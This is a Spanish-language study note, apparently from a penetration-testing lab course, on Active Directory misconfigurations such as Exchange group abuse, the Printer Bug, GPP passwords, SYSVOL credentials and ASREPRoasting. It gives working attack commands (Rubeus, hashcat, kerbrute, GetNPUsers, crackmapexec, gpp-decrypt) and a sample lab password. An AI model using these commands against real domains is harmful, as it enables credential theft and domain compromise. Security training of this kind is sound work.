Miscellaneous Misconfigurations in Active Directory

Muchas configuraciones incorrectas pueden aparecer durante una evaluación de AD. Conocerlas te permite detectar vectores silenciosos y potentes que suelen pasar desapercibidos.

📡 Exchange Related Group Membership

🔐 Exchange Windows Permissions

¿Por qué es peligroso?

Los miembros pueden escribir la DACL del dominio, lo que permite otorgarse DCSync, comprometiendo toda la red.


📬 Organization Management

Equivalente a Domain Admin pero para Exchange

⚡ PrivExchange

Vulnerabilidad crítica

Cualquier usuario con buzón puede escalar a Domain Admin.

💥 Resultado:
Un usuario estándar → Domain Admin.


🖨️ Printer Bug (MS-RPRN)

También conocido como Print Spooler Bug

Cualquier usuario puede forzar al spooler (SYSTEM) a autenticarse hacia tu equipo → Relaying a LDAP

Usos:

🔎 Enumeración

Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL

🧨 MS14-068

Vulnerabilidad PAC de Kerberos

Permitía falsificar un PAC válido y elevar a Domain Admin.


👀 Sniffing LDAP Credentials


🌐 Enumerando DNS con adidnsdump

adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
Tip

-r fuerza resolución de hosts desconocidos.

Esto permite descubrir hosts “ocultos” como:

LOGISTICS → 172.16.5.240


🔍 Misconfiguraciones Comunes

📝 Passwords en Descripciones

Get-DomainUser * | Select samaccountname,description | Where {$_.Description -ne $null}

⚑ PASSWD_NOTREQD Flag

Warning

Este flag permite contraseñas muy cortas.
Perfecto para rápido password spraying.

Get-DomainUser -UACFilter PASSWD_NOTREQD | Select samaccountname,useraccountcontrol

{CCB6F134-F708-4CBB-AB46-1FC0A2AFB265}.png


🗂️ Credenciales en SYSVOL Scripts

SYSVOL es accesible para todos los usuarios autenticados.

ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts

Ejemplo:

sUser = "Administrator" sPwd = "!ILFREIGHT_L0cALADmin!"

Luego:

crackmapexec smb --local-auth

🔐 Group Policy Preferences (GPP)

GPP almacenaba contraseñas en SYSVOL con el atributo cpassword
→ Cifradas con UNA CLAVE AES conocida (filtrada por Microsoft).

Ejemplo decrypt:

gpp-decrypt <cpassword>

Herramientas:

# Powershell
Get-GPPPassword.ps1

# CME
crackmapexec smb ... -M gpp_password
crackmapexec smb ... -M gpp_autologin

🔥 ASREPRoasting

Info

Aplica a usuarios sin Kerberos Pre-Auth:
✔ Exposición silenciosa
✔ Sin necesidad de contraseñas

Enumeración PowerView

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol

Tenemos dos usuarios
{7AE670CD-BEF7-42A5-A9E3-C421248F1AB2}.png

Dump AS-REP

Rubeus.exe asreproast /user:ygroce /nowrap /format:hashcat

Pasted image 20251120184351.png

Crack

hashcat -m 18200 hash rockyou.txt

Pasted image 20251120185000.png

Kerbrute

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 users.txt

Impacket

GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile users.txt

🧩 Otros Misconfigs

📌 GPO Abuse